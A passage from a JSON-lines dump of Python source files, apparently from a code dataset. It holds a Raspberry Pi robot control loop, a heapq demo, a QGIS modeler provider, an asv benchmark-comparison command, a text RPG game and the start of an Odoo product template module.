0.5)\n turn_robot_mange_degrees_right()\n drive_robot(FORWARDS, 1.0)\n print(\"Skarp sving, avstand\", dist_3)\n \n dist_3 = motor_serial.get_dist_3()\n if dist_3 > 60:\n drive_robot(FORWARDS, 0.8)\n turn_robot_mange_degrees_right()\n drive_robot(FORWARDS, 0.8)\n print(\"Skarp sving 2, avstand\", dist_3)\n else:\n drive_robot(FORWARDS, 0.1)\n\n elif dist_3 > 25 and dist_1 > 25 and dist_4 > 30 and dist_2 > 40:\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n fortsett = True\n gi_deg = 0\n while(fortsett):\n gi_deg += 1\n drive_robot(FORWARDS, 0.2)\n if gi_deg % 4 == 0:\n turn_robot_90_degrees_right()\n dist_4 = motor_serial.get_dist_4()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n print(\"FINN VEGG\", gi_deg, dist_4)\n if dist_4 < 30 or dist_3 < 25 or dist_2 < 25 or gi_deg > 16:\n print(\"Gi deg\")\n fortsett = False\n \n elif dist_3 > (dist_1) or dist_3 > 50:\n turn_robot_90_degrees_right()\n drive_robot(FORWARDS, 0.1)\n print(\"Liten justering høyre: \", dist_3)\n\n elif dist_1 > (dist_3):\n turn_robot_90_degrees_left()\n drive_robot(FORWARDS, 0.1)\n print(\"Venstre\")\n \n \n else:\n drive_robot(FORWARDS, 0.1)\n\n ###############################################################\n # A #\n # A #\n # |_________________________________________________________| #\n # #\n # This is the end of our loop, #\n # execution continus at the start of our loop #\n ###############################################################\n ###############################################################\n '''\n elif dist_3 > 25 and dist_1 > 25 and dist_4 > 30 and dist_2 > 40:\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n fortsett = True\n gi_deg = 0\n while(fortsett):\n gi_deg += 1\n drive_robot(FORWARDS, 0.05)\n if gi_deg % 4 == 0:\n turn_robot_90_degrees_right()\n dist_4 = motor_serial.get_dist_4()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n print(\"FINN VEGG\", gi_deg, dist_4)\n if dist_4 < 30 or dist_3 < 25 or dist_2 < 25 or gi_deg > 16:\n print(\"Gi deg\")\n fortsett = False\n '''\n\n\n\n\n# motor_serial has told us that its time to exit\n# we have now exited the loop\n# It's only polite to say goodbye\nprint(\"Goodbye\")\n","sub_path":"python/raspi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243641640","text":"import heapq\n\n#It will be minimum heap implementation in python\nheap = [4, 7, 3, -2, 1, 0]\nnum = [4, 7, 3, -2, 1, 0]\nheap_data = []\n# print(heap)\nheapq.heapify(heap)\n# print(heap)\n\nfor value in num:\n heapq.heappush(heap_data, value)\n\n# print(heap_data)\n\nwhile heap_data:\n print(heapq.heappop(heap_data))","sub_path":"Heaps/Inbuilt_heap.py","file_name":"Inbuilt_heap.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"296713501","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n ModelerAlgorithmProvider.py\n ---------------------\n Date : August 2012\n Copyright : (C) 2012 by Victor Olaya\n Email : volayaf at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Victor Olaya'\n__date__ = 'August 2012'\n__copyright__ = '(C) 2012, Victor Olaya'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\n\nfrom PyQt4.QtGui import QIcon\n\nfrom processing.core.AlgorithmProvider import AlgorithmProvider\nfrom processing.core.ProcessingConfig import ProcessingConfig, Setting\nfrom processing.core.ProcessingLog import ProcessingLog\nfrom processing.modeler.ModelerUtils import ModelerUtils\nfrom processing.modeler.ModelerAlgorithm import ModelerAlgorithm\nfrom processing.modeler.WrongModelException import WrongModelException\nfrom processing.modeler.EditModelAction import EditModelAction\nfrom processing.modeler.CreateNewModelAction import CreateNewModelAction\nfrom processing.modeler.DeleteModelAction import DeleteModelAction\nfrom processing.modeler.AddModelFromFileAction import AddModelFromFileAction\nfrom processing.gui.GetScriptsAndModels import GetModelsAction\n\npluginPath = os.path.split(os.path.dirname(__file__))[0]\n\n\nclass ModelerAlgorithmProvider(AlgorithmProvider):\n\n def __init__(self):\n AlgorithmProvider.__init__(self)\n self.actions = [CreateNewModelAction(), AddModelFromFileAction(), GetModelsAction()]\n self.contextMenuActions = [EditModelAction(), DeleteModelAction()]\n\n def initializeSettings(self):\n AlgorithmProvider.initializeSettings(self)\n ProcessingConfig.addSetting(Setting(self.getDescription(),\n ModelerUtils.MODELS_FOLDER, self.tr('Models folder', 'ModelerAlgorithmProvider'),\n ModelerUtils.modelsFolder(), valuetype=Setting.FOLDER))\n\n def setAlgsList(self, algs):\n ModelerUtils.allAlgs = algs\n\n def modelsFolder(self):\n return ModelerUtils.modelsFolder()\n\n def getDescription(self):\n return self.tr('Models', 'ModelerAlgorithmProvider')\n\n def getName(self):\n return 'model'\n\n def getIcon(self):\n return QIcon(os.path.join(pluginPath, 'images', 'model.png'))\n\n def _loadAlgorithms(self):\n folder = ModelerUtils.modelsFolder()\n self.loadFromFolder(folder)\n\n def loadFromFolder(self, folder):\n if not os.path.exists(folder):\n return\n for path, subdirs, files in os.walk(folder):\n for descriptionFile in files:\n if descriptionFile.endswith('model'):\n try:\n fullpath = os.path.join(path, descriptionFile)\n alg = ModelerAlgorithm.fromFile(fullpath)\n if alg.name:\n alg.provider = self\n alg.descriptionFile = fullpath\n self.algs.append(alg)\n else:\n ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,\n self.tr('Could not load model %s', 'ModelerAlgorithmProvider') % descriptionFile)\n except WrongModelException as e:\n ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,\n self.tr('Could not load model %s\\n%s', 'ModelerAlgorithmProvider') % (descriptionFile, e.msg))\n","sub_path":"processing/modeler/ModelerAlgorithmProvider.py","file_name":"ModelerAlgorithmProvider.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343317279","text":"# -*- coding: utf-8 -*-\n# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport os\n\nimport six\n\nfrom . import Command\nfrom .run import Run\n\nfrom ..console import log, truncate_left, color_print\nfrom ..repo import get_repo\nfrom .. import results\nfrom .. import util\n\n\nclass Continuous(Command):\n @classmethod\n def setup_arguments(cls, subparsers):\n parser = subparsers.add_parser(\n \"continuous\", help=\n \"Run a side-by-side comparison of two commits for continuous \"\n \"integration.\")\n\n parser.add_argument(\n 'branch', nargs=1, default='master',\n help=\"\"\"The HEAD branch to test. This commit and its\n parent commit will be used as the two commits for\n comparison.\"\"\")\n parser.add_argument(\n '--factor', \"-f\", nargs='?', type=float, default=2.0,\n help=\"\"\"The factor above or below which a result is\n considered problematic. For example, with a factor of 2,\n if a benchmark gets twice as slow or twice as fast, it\n will be displayed in the results list.\"\"\")\n parser.add_argument(\n \"--bench\", \"-b\", type=str, nargs=\"*\",\n help=\"\"\"Regular expression(s) for benchmark to run. When\n not provided, all benchmarks are run.\"\"\")\n parser.add_argument(\n \"--machine-defaults\", action=\"store_true\",\n help=\"\"\"Use autogenerated defaults for the machine information,\n instead of using the .asv-machine.json file\"\"\")\n\n parser.set_defaults(func=cls.run_from_args)\n\n return parser\n\n @classmethod\n def run_from_conf_args(cls, conf, args):\n return cls.run(\n conf=conf, branch=args.branch[0], factor=args.factor,\n bench=args.bench, machine_defaults=args.machine_defaults\n )\n\n @classmethod\n def run(cls, conf, branch=\"master\", factor=2.0, bench=None,\n machine_defaults=False):\n repo = get_repo(conf)\n\n repo.checkout_remote_branch('origin', branch)\n head = repo.get_hash_from_head()\n\n repo.checkout_parent()\n parent = repo.get_hash_from_head()\n\n commit_hashes = [head, parent]\n run_objs = {}\n\n result = Run.run(\n conf, range_spec=commit_hashes, bench=bench,\n machine_defaults=machine_defaults, _returns=run_objs)\n if result:\n return result\n\n tabulated = []\n for commit_hash in commit_hashes:\n subtab = {}\n totals = {}\n for benchmark in run_objs['benchmarks']:\n subtab[benchmark] = 0.0\n totals[benchmark] = 0\n\n for env in run_objs['environments']:\n filename = results.get_filename(\n run_objs['machine_params']['machine'], commit_hash, env)\n filename = os.path.join(conf.results_dir, filename)\n result = results.Results.load(filename)\n\n for benchmark in run_objs['benchmarks']:\n timing = results.results.get(benchmark, None)\n if timing is not None:\n subtab[benchmark] += timing\n totals[benchmark] += 1\n\n for benchmark in run_objs['benchmarks']:\n subtab[benchmark] /= totals.get(benchmark, 1)\n\n tabulated.append(subtab)\n\n after, before = tabulated\n\n table = []\n slowed_down = False\n for name, benchmark in six.iteritems(run_objs['benchmarks']):\n change = after[name] / before[name]\n if change > factor or change < 1.0 / factor:\n table.append(\n (change, before[name], after[name], name, benchmark))\n if change > factor:\n slowed_down = True\n\n print()\n\n if not len(table):\n color_print(\"BENCHMARKS NOT SIGNIFICANTLY CHANGED.\\n\", 'green')\n return 0\n\n table.sort(reverse=True)\n\n color_print(\"SOME BENCHMARKS HAVE CHANGED SIGNIFICANTLY.\\n\", 'red')\n print()\n color_print(\n \"{0:40s} {1:>8} {2:>8} {3:>8}\\n\".format(\"BENCHMARK\", \"BEFORE\", \"AFTER\", \"FACTOR\"),\n 'blue')\n for change, before, after, name, benchmark in table:\n before_display = util.human_value(before, benchmark['unit'])\n after_display = util.human_value(after, benchmark['unit'])\n\n print(\"{0:40s} {1:>8} {2:>8} {3:.8f}x\".format(\n truncate_left(name, 40),\n before_display, after_display, change))\n\n color_print(\n \"SOME BENCHMARKS HAVE CHANGED SIGNIFICANTLY.\\n\", 'red')\n\n return slowed_down\n","sub_path":"asv/commands/continuous.py","file_name":"continuous.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323669915","text":"import sys\nimport os\nimport time\nfrom character import *\nfrom monster import *\n\n\nclass Game:\n\n # CORE GAME LOOP\n def __init__(self):\n os.system('clear')\n self.setup()\n\n # RUNS WHILE PLAYER ALIVE AND AT LEAST ONE ENEMY REMAINS\n while self.player.hp > 0 and (self.monster or self.monster_pool or self.boss):\n\n # PRINT HEADER WITH PLAYER / MONSTER INFO\n os.system('clear')\n print('='*90)\n print(self.player)\n print('-'*90)\n print(self.monster.battlecry(), \"\\nA wild creature appears:\")\n print(self.monster)\n print('-'*90)\n\n #PLAYER TURN\n self.player_turn()\n print(' ')\n\n #MONSTER TURN\n self.monster_turn()\n print(' ')\n\n #CLEANUP\n self.cleanup()\n if not self.player.killed_a_monster:\n print('-'*90)\n input('End of turn. Press [Enter] to continue.')\n\n # IF PLAYER REMAINS\n if self.player.hp > 0:\n time.sleep(1)\n print(\"\\nCongrats! You defeated all the monsters! You win!\")\n time.sleep(1)\n\n # IF ONE ENEMY REMAINS\n elif self.monster or self.monster_pool or self.boss:\n time.sleep(1)\n print(\"\\nYou're dead!\")\n time.sleep(1)\n\n sys.exit()\n\n # SPAWNS PLAYER AND MONSTERS\n def setup(self):\n self.player = self.get_job()\n self.monster_pool = [Goblin(), Troll(), Goblin(), Troll(), Goblin()]\n self.boss = [Dragon()]\n self.monster = self.get_next_monster()\n self.monster_actions = [\"is in no mood to attack\",\n \"looks at you with disdain\",\n \"takes a nap\",\n \"wanders around nervously\",\n \"can't be bothered\",\n \"arrogantly ignores you\",\n \"scratches his nose\"]\n\n self.monster_deaths = [\"dies!\",\n \"screams in agony, and collapses!\",\n \"takes a fatal blow from your {}!\".format(self.player.weapon),\n \"succumbs to his wounds!\",\n \"runs away in despair, and bleeds to death.\",\n \"breathes his last breath... RIP!\"]\n\n input(\"Press [Enter] to start the game.\")\n\n # GETS NEXT MONSTER FROM POOL, AND THEN BOSS\n def get_next_monster(self):\n if len(self.monster_pool) > 0:\n return self.monster_pool.pop(self.monster_pool.index(random.choice(self.monster_pool)))\n else:\n try:\n return self.boss.pop(0)\n except IndexError:\n return None\n\n # MONSTER TURN\n def monster_turn(self):\n self.player.killed_a_monster = False\n\n # IF PLAYER (STILL) CONFUSED, IT FINALLY WEARS OFF \n if 'confused' in self.player.status:\n self.player.status.remove('confused')\n\n # MONSTER DEATH SCENARIOS\n if self.monster.hp <= 0:\n time.sleep(1.5)\n d = self.monster_deaths.pop(self.monster_deaths.index(random.choice(self.monster_deaths)))\n print(\"{}! The {} {} {}\".format(self.monster.battlecry(),\n self.monster.color,\n self.monster.__class__.__name__,\n d))\n\n # MONSTER ATTACK PHASE\n else:\n\n # IF MONSTER DOES ATTACK\n if self.monster.attack_hits(self.monster.weapon):\n time.sleep(1.5)\n print(\"The {} {} attacks you with his {}!\".format(self.monster.color,\n self.monster.__class__.__name__,\n self.monster.weapon))\n\n # HE MAY OR MAY NOT FALL IN THE TRAP\n if self.player.laid_trap:\n if random.randint(0, 100) > 30:\n print(\"CLING! The {} steps on the trap and gets stunned!\"\n .format(self.monster.__class__.__name__))\n self.player.laid_trap = False\n return\n\n # IF ATTACK GOES THROUGH, PLAYER TRIES TO DODGE\n time.sleep(1.5)\n print(\"\\nYou try to dodge the attack...\", end='')\n\n # DODGE SUCCESSFUL = END MONSTER'S TURN\n if self.player.dodge(self.player.weapon):\n time.sleep(0.5)\n print(\" and succeed!\")\n time.sleep(1.5)\n return\n\n # DODGE FAILS = PROCEED\n else:\n time.sleep(0.5)\n print(\" but you fail!\")\n dmg = self.monster.get_dmg(self.monster.weapon)\n self.player.hp -= dmg\n time.sleep(1)\n print(\"The {} {} hits you for {} HP.\".format(self.monster.color,\n self.monster.__class__.__name__,\n dmg))\n\n # MONSTER CAN APPLY ON-HIT EFFECT\n time.sleep(0.5)\n if random.randint(0, 100) > 50:\n self.monster.on_hit_effect(self.player)\n time.sleep(1.5)\n\n # CHECK FOR SILENCED STATUS\n self.apply_debuff('silenced')\n\n # WARRIOR COUNTER-ATTACK (MIN LVL 2)\n if self.player.job == \"Warrior\":\n if self.player.xpn > 5:\n if random.randint(0, 100) >= 60:\n print(\"\\nCounter-attack!\")\n self.player_attack_phase()\n\n # IF MONSTER DOESN'T ATTACK \n else:\n time.sleep(1.5)\n print(\"The {} {} \".format(self.monster.color, self.monster.__class__.__name__)\n + random.choice(self.monster_actions) + '...')\n time.sleep(1.5)\n\n # IF PLAYER SPENT 1 TURN SILENCED, RESTORE HIS POWERS\n try:\n self.player.silence_duration -= 1\n print(\" silence duration {}\".format(self.player.silence_duration))\n if self.player.silence_duration == 0:\n del self.player.silence_duration\n if 'silenced' in self.player.status:\n self.player.status.remove('silence')\n self.player.job = self.player.old_job\n if self.player.job == \"Warrior\":\n self.player.base_hp = 14\n if self.player.hp_diff < 0:\n self.player.hp += 4\n except AttributeError:\n pass\n\n #PLAYER TURN\n def player_turn(self):\n time.sleep(0.5)\n\n # CHECK FOR BURNING STATUS\n self.apply_debuff('burning')\n\n # CHECK FOR FROZEN STATUS (PASS TURN UNLESS PLAYER CURES IT)\n if 'frozen' in self.player.status:\n print(\"You are frozen! Can't do anything!\")\n time.sleep(1)\n if self.player.job == \"Priest\" and self.player.spell_1_casts > 0:\n if input(\"Luckily you're a Priest. Use [C]ure? [y/n]\\n> \").lower() in 'cy':\n self.player.spell_1(self.player)\n time.sleep(0.5)\n else:\n return\n else:\n self.player.status.remove('frozen')\n return\n\n # CHECK FOR SILENCED STATUS\n if 'silenced' in self.player.status:\n print(\"You are silenced!\")\n time.sleep(1)\n if self.player.old_job == \"Priest\" and self.player.spell_1_casts > 0:\n if input(\"Luckily you're a Priest. Use [C]ure? [y/n]\\n> \").lower() in 'cy':\n self.player.spell_1(self.player)\n self.player.job = self.player.old_job\n if self.player.job == \"Warrior\":\n self.player.base_hp = 14\n if self.player.hp_diff < 0:\n self.player.hp += 4\n time.sleep(0.5)\n\n else:\n self.player.status.remove('silenced')\n\n # MAIN PHASE\n print(\"\\nYour turn! What will you do?\")\n self.player_main_phase()\n\n # PLAYER MAIN ACTION PHASE\n def player_main_phase(self):\n\n # PROMPTS PLAYER FOR ACTION\n self.action_prompt()\n\n # PHYSICAL ATTACK PHASE\n if self.action == 'a':\n\n # IF PLAYER IS CONFUSED, HE MIGHT HURT HIMSELF\n if 'confused' in self.player.status:\n self.player.status.remove('confused')\n if random.randint(0, 100) > 50:\n time.sleep(0.5)\n print(\"\\nYou're so confused!\")\n time.sleep(0.5)\n dmg = self.player.get_dmg(self.player.weapon)\n print(\"You trip and fall down head first on your {},\"\n \"hurting yourself for {} damage!\"\n .format(self.player.weapon, dmg))\n self.player.hp -= dmg\n time.sleep(1)\n\n # IN CASE PLAYER DIES OF CONFUSION\n if self.player.hp <= 0:\n print(\"Silly you... you killed yourself! You lose!\")\n sys.exit()\n else:\n self.player_attack_phase()\n else:\n self.player_attack_phase()\n\n # REST\n elif self.action == 'r':\n self.player.rest()\n time.sleep(0.5)\n print(\"\\nYou rest, and regenerate 1 HP!\")\n\n # QUIT\n elif self.action == 'q':\n time.sleep(0.5)\n print(\"\\nYou flee like a coward!\")\n sys.exit()\n\n # CAST PHASE DEPENDING ON JOB\n else:\n self.player_cast_phase('Sorcerer', 'd', 'g')\n self.player_cast_phase('Priest', 'c', 'h')\n self.player_cast_phase('Hunter', 't', 's')\n\n # PLAYER SPELL CAST PHASE\n def player_cast_phase(self, what_job, action1, action2):\n\n # RESTRICTS ACTIONS TO SPECIFIC JOB\n if self.player.job == what_job:\n\n # CAST SPELL LVL 1\n if self.action == action1:\n if self.player.spell_1_casts > 0:\n self.player.spell_1(self.monster)\n self.player.spell_1_casts -= 1\n else:\n print(\"You can't cast this spell anymore!\")\n self.player_main_phase()\n\n # CAST SPELL LVL 2\n elif self.action == action2:\n if self.player.spell_2_casts > 0:\n self.player.spell_2(self.monster)\n self.player.spell_2_casts -= 1\n\n else:\n print(\"You can't cast this spell anymore!\")\n self.player_main_phase()\n\n # CUSTOM ACTION PROMPT DEPENDING ON JOB\n def action_prompt(self):\n\n # CASE OF SORCERER, PRIEST AND HUNTER\n if not self.player.job in [\"Warrior\", 'Jobless']:\n\n # DISPLAY RELEVANT SPELLS (IF LVL 1 OR LVL 2)\n if self.player.xpn == 5:\n action = input('\\n[A]ttack \\n{} ({}) \\n[R]est \\n[Q]uit\\n\\n> '\n .format(self.player.spell_1_name, self.player.spell_1_casts)).lower()\n else:\n action = input('\\n[A]ttack \\n{} ({}) \\n{} ({}) \\n[R]est \\n[Q]uit\\n\\n> '\n .format(self.player.spell_1_name, self.player.spell_1_casts,\n self.player.spell_2_name, self.player.spell_2_casts)).lower()\n\n # CASE OF WARRIOR OR 'JOBLESS' (NO ACTIVE SPELL)\n else:\n action = input('\\n[A]ttack \\n[R]est \\n[Q]uit\\n\\n> ')\n\n # MAKE SURE THAT ONLY JOB ALLOWED ACTIONS ARE SELECTED\n for job, allowed_actions in {'Jobless': 'arq',\n 'Warrior': 'arq',\n 'Sorcerer': 'arqdg',\n 'Priest': 'arqch',\n 'Hunter': 'arqts'}.items():\n if self.player.job == job:\n if action in allowed_actions and action != '':\n self.action = action\n else:\n self.action_prompt()\n\n # CHECK FOR 'BURNING' OR 'SILENCED', DEBUFF AND APPLIES THE CONSEQUENCES:\n def apply_debuff(self, debuff):\n if debuff in self.player.status:\n\n # BURNING?\n if debuff == 'burning':\n print(\"You're burning! You take 1 damage.\")\n time.sleep(1.5)\n self.player.hp -= 1\n self.player.burn_duration -= 1\n if self.player.burn_duration == 0:\n self.player.status.remove('burning')\n\n # IN CASE THE BURNING KILLS THE PLAYER\n if self.player.hp <= 0:\n time.sleep(1)\n print(\"The fire damage was fatal... You die!\")\n time.sleep(1)\n sys.exit()\n\n # SILENCED?\n elif debuff == 'silenced':\n if self.player.silence_duration == 2:\n print(\"You lose all your special powers!\")\n time.sleep(1.5)\n if self.player.job == \"Warrior\":\n if self.player.hp > 10:\n self.player.hp_diff = self.player.hp - self.player.base_hp\n self.player.hp = 10 + self.player.hp_diff\n self.player.base_hp = 10\n if self.player.job != 'Jobless':\n self.player.old_job = self.player.job\n self.player.job = \"Jobless\"\n\n # PLAYER PHYSICAL ATTACK PHASE\n def player_attack_phase(self):\n time.sleep(0.5)\n print(\"\\nYou draw your {} to attack the {}...\".format(self.player.weapon,\n self.monster.__class__.__name__), end='')\n\n # PLAYER HITS\n if self.player.attack_hits(self.player.weapon):\n time.sleep(0.5)\n print(\" and hit!\")\n time.sleep(1)\n print(\"The {} tries to dodge...\".format(self.monster.__class__.__name__), end='')\n sys.stdout.flush()\n\n # MONSTER DODGES\n if self.monster.dodge(self.monster.weapon):\n time.sleep(0.5)\n print(\" and succeeds!\")\n\n # MONSTER DODGE FAILS\n else:\n time.sleep(0.5)\n print(\" but he fails!\")\n dmg = self.player.get_dmg(self.player.weapon)\n self.monster.hp -= dmg\n time.sleep(1)\n print(\"You hit it for {} HP.\".format(dmg))\n\n # PLAYER MISSES\n else:\n sys.stdout.flush()\n time.sleep(0.5)\n print(\" but you miss!\")\n\n # DEAD MONSTER CLEANUP\n def cleanup(self):\n if self.monster.hp <= 0:\n time.sleep(1.5)\n print(\"You have defeated the {} {} !\".format(self.monster.color, self.monster.__class__.__name__))\n self.player.killed_a_monster = True\n time.sleep(0.5)\n print(\"You gain {} XP!\".format(self.monster.xp))\n self.player.xp += self.monster.xp\n\n # PLAYER LEVELS UP\n if self.player.leveled_up():\n time.sleep(1)\n print(\"\\nLEVEL UP! You gain +1 max. damage, and +1 accuracy!\")\n time.sleep(1)\n if self.player.xpn == 5:\n print(\"You learn {}!\".format(self.player.spell_2_name))\n time.sleep(1)\n self.player.max_dmg += 1\n self.player.attack_dice += 1\n self.player.xp -= self.player.xpn\n self.player.xpn += 1\n\n self.monster = self.get_next_monster()\n print('\\n'+'='*90)\n\n # PRINTS RELEVANT FOOTER\n if len(self.boss) != 0:\n input(\"{} enemies remaining. Press [Enter] to go ahead. \"\n .format(len(self.monster_pool)+len(self.boss)))\n else:\n input(\"You've woken up the ancient Dragon! Press [Enter] to go ahead. \")\n\n # INFO ABOUT WHICH SPELLS AVAILABLE FOR WHICH JOBS\n @staticmethod\n def show_jobs():\n print('-'*90)\n print('Jobs:')\n print('-'*90)\n print(\" ◊ [W]arrior: \\t Lv. 1: +4 base HP (Passive).\")\n print(\" \\t Lv. 2: Counter-attack (Passive: 60% chance to counter-attack for free).\\n\")\n print(\" ◊ [S]orcerer: Lv. 1: Drain Life (Inflicts attack damage, and converts them to HP).\")\n print(\" Lv. 2: Greenify (Resets monster color to Green).\\n\")\n print(\" ◊ [P]riest: \\t Lv. 1: Cure (Removes 'burning', 'frozen', 'silenced' and 'confused').\")\n print(\" \\t Lv. 2: Heal (Heals yourself for an amount equal to your attack damage.)\\n\")\n print(\" ◊ [H]unter: \\t Lv. 1: Trap (Lays a trap that can stun the enemy when he attacks).\")\n print(\" \\t Lv. 2: Snipe (Next attack can't be missed or dodged, and inflicts +1 dmg).\")\n print('-'*90)\n\n # LETS PLAYER CHOOSE THEIR JOB\n def get_job(self):\n print('Choose your job:')\n job_choice = input('[W]arrior, [S]orcerer, [P]riest, [H]unter, or [C] to show job characteristics\\n> ').lower()\n if job_choice in 'wsphc' and job_choice != '':\n if job_choice == 'w':\n return Warrior()\n elif job_choice == 's':\n return Sorcerer()\n elif job_choice == 'p':\n return Priest()\n elif job_choice == 'h':\n return Hunter()\n elif job_choice == 'c':\n self.show_jobs()\n self.get_job()\n else:\n self.get_job()\n\n\nGame() ","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":18305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6848437","text":"# -*- coding: utf-'8' \"-*-\"\nfrom openerp import api, models, fields\nfrom openerp.tools.translate import _\n\n__author__ = 'Michael Karrer'\n\n\n# Product Template\n# ATTENTION: There are unported parts for product.template in website_sale_donate.py !\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n _step_config_fields = ['hide_cart_indicator', 'cart_indicator_name',\n 'hide_product_indicator', 'product_indicator_name',\n 'hide_checkout_indicator', 'checkout_indicator_name',\n 'hide_payment_indicator', 'payment_indicator_name',\n 'hide_confirmation_indicator', 'confirmation_indicator_name']\n\n website_published_start = fields.Datetime('Website Published Start')\n website_published_end = fields.Datetime('Website Published End')\n website_visible = fields.Boolean('Visible in Website (computed)', readonly=True,\n compute=\"compute_website_visible\", store=True)\n\n # Shop Step/Page Indicator Setup\n step_indicator_setup = fields.Boolean(string=\"Individual Step-Indicator Setup\")\n\n step_indicator_ul_class = fields.Char(string=\"Step-Indicator